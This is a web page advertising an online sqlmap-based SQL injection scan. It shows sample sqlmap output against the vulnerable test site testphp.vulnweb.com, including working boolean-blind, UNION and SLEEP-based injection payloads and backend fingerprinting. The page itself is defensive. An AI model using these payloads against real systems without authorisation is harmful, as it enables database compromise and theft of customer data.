SQL Injection Test

SQL Injection Test Help

SQL Injection is a significant ongoing risk to organizations on the Internet as can be seen by recent news reports.

Using sqlmap this sql injection scan attempts to exploit sql injection in a HTTP GET parameter of the url you specify.

Entering a web address into the form will have that url tested for SQL Injection by one of our external servers. This type of vulnerability could allow back-end database manipulation, access to customer data or even operating system access.

A url with parameters at the end is the type of URI tested by this scan:

www.example.com?id=2&page=2

This example url will have the HTTP GET parameter’s id and page tested for sql injection.

Sample Results

    sqlmap/0.9 - automatic SQL injection and database takeover tool<br>

http://sqlmap.sourceforge.net<br>

<br>
[*] starting at: 09:04:35<br>
<br>
[09:04:36] [INFO] using '/opt/sqlmap/output/testphp.vulnweb.com/session' as session file<br>
[09:04:36] [INFO] testing connection to the target url<br>
[09:04:37] [INFO] testing if the url is stable, wait a few seconds<br>
[09:04:38] [INFO] url is stable<br>
[09:04:38] [INFO] testing if GET parameter 'artist' is dynamic<br>
[09:04:38] [INFO] confirming that GET parameter 'artist' is dynamic<br>
[09:04:39] [INFO] GET parameter 'artist' is dynamic<br>
[09:04:39] [INFO] heuristic test shows that GET parameter 'artist' might be injectable (possible DBMS: MySQL)<br>
[09:04:39] [INFO] testing sql injection on GET parameter 'artist'<br>
[09:04:39] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'<br>
[09:04:40] [INFO] GET parameter 'artist' is 'AND boolean-based blind - WHERE or HAVING clause' injectable <br>
[09:04:40] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'<br>
[09:04:41] [INFO] testing 'MySQL > 5.0.11 stacked queries'<br>
[09:04:41] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'<br>
[09:04:52] [INFO] GET parameter 'artist' is 'MySQL > 5.0.11 AND time-based blind' injectable <br>
[09:04:52] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'<br>
[09:04:55] [INFO] target url appears to be UNION injectable with 3 columns<br>
[09:04:56] [INFO] GET parameter 'artist' is 'MySQL UNION query (NULL) - 1 to 10 columns' injectable<br>
GET parameter 'artist' is vulnerable. Do you want to keep testing the others? [y/N] N<br>
sqlmap identified the following injection points with a total of 23 HTTP(s) requests:<br>
---<br>
Place: GET<br>
Parameter: artist<br>
    Type: boolean-based blind<br>
    Title: AND boolean-based blind - WHERE or HAVING clause<br>
    Payload: artist=2 AND 683=683<br>
<br>
    Type: UNION query<br>
    Title: MySQL UNION query (NULL) - 1 to 10 columns<br>
    Payload: artist=-743 UNION ALL SELECT NULL, CONCAT(CHAR(58,105,117,110,58),IFNULL(CAST(CHAR(67,106,71,66,118,97,119,68,106,119) AS CHAR),CHAR(32)),CHAR(58,100,107,122,58)), NULL#<br>
<br>
    Type: AND/OR time-based blind<br>
    Title: MySQL > 5.0.11 AND time-based blind<br>
    Payload: artist=2 AND SLEEP(5)<br>
---<br>
<br>
[09:05:16] [INFO] the back-end DBMS is MySQL<br>
web server operating system: Linux Ubuntu 6.10 or 6.06 (Edgy Eft or Dapper Drake)<br>
web application technology: Apache 2.0.55, PHP 5.1.2<br>
back-end DBMS: MySQL 5.0.11<br>
[09:05:16] [INFO] Fetched data logged to text files under '/opt/sqlmap/output/testphp.vulnweb.com'<br>
<br>
[*] shutting down at: 09:05:16<br>

Online SQL Injection scan to test for injectable parameters on a web URI, testing methods include blind and error based SQL Injection.

Note that you must have permission to scan the site you nominate. It is possible that automated security scans will upset listening services, fill up log files and trigger IDS.

Enter the url to test and your email address; results are delivered by email.

Start SQL Injection Test Scan

Access to this scan is restricted.

Membership is required to use this security scan. Immediate access is available to new members or login now if you have a valid membership. This restriction has recently been added, see this blog post for full details of the changes.


About SQL Injection

SQL Injection is a common attack vector in dynamic web applications. It allows an attacker to gain access to the database or database functions through poor coding methodology. A good SQL injection reference is over at the owasp site.

Recently there have been a number of high profile attacks that have been exploited by SQL Injection, these have resulted in the loss of millions of customer records and hundreds of thousands of login / password combinations.


×